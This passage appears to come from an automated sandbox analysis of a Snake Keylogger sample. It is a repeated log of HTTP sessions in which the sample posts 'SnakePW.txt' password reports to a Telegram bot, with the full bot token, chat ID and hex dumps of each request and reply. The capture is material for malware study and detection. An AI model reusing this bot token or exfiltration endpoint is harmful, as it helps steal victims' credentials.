                            Data Ascii: {"ok":true,"result":{"message_id":67059,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228876,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            275192.168.2.550209149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:37 UTC464OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571b03a336
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:37 UTC464OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 30 33 61 33 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571b03a336Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:37 UTC465INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:37 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:37 UTC465INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67060,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228877,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            276192.168.2.550210149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:37 UTC466OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571b3f3da5
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:37 UTC466OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 33 66 33 64 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571b3f3da5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:37 UTC466INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:37 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:37 UTC467INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67062,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228877,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            277192.168.2.550211149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:37 UTC467OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571b7d4400
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:37 UTC468OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 37 64 34 34 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571b7d4400Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:38 UTC468INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:38 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:38 UTC468INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67063,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228878,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            278192.168.2.550212149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:38 UTC469OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571bb8d6a7
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:38 UTC469OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 62 38 64 36 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571bb8d6a7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:38 UTC470INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:38 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:38 UTC470INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67064,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228878,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            279192.168.2.550213149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:38 UTC471OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571befac4e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:38 UTC471OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 65 66 61 63 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571befac4eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:38 UTC471INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:38 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:38 UTC472INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67065,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228878,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            28192.168.2.549796149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:49 UTC47OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756db162a23
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:49 UTC47OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 62 31 36 32 61 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756db162a23Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:50 UTC48INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:50 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:50 UTC48INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66775,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228770,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            280192.168.2.550214149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:38 UTC472OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571c2b47ee
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:38 UTC473OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 32 62 34 37 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571c2b47eeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:39 UTC473INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:39 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:39 UTC474INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67067,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228879,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            281192.168.2.550215149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:39 UTC474OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571c6947c9
                            Host: api.telegram.org
                            Content-Length: 504
